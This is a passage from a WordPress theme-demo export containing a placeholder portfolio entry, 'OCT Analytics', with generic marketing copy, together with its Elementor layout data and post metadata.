		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>OCT Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/oct-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=810</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>May 22, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>810</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[oct-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[811]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"759b1f9d","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4bee6d25","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"e966785","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"517cac51","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"1f78d6b4","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"50e4423d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5eda56ee","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5124a12","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1813e19b","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2c9be0ed","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5f5cb943","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"382ee553","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca083f3","elType":"widget","settings":{"editor":"<p>May 22, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"28cceda7","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5ef59f12","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6fd44f36","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2ca63cf2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6351dbe6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"31153e4","elType":"section","settings":[],"elements":[{"id":"9122214","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"cad2a2d","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e1e4c17","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0ffeec4","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"ebe97e0","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"6b6aed1","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9917343","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0b6ca1f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"68a491f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d093616","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"a53bc23","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bfa8479","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"588d428","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2d616f9","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6085922","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"243060d","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"6f43885","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2e2416c","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1532b6a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"95d9c35","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"c2cc128","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"f541394","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"d8f3bdd","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"0f96364","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_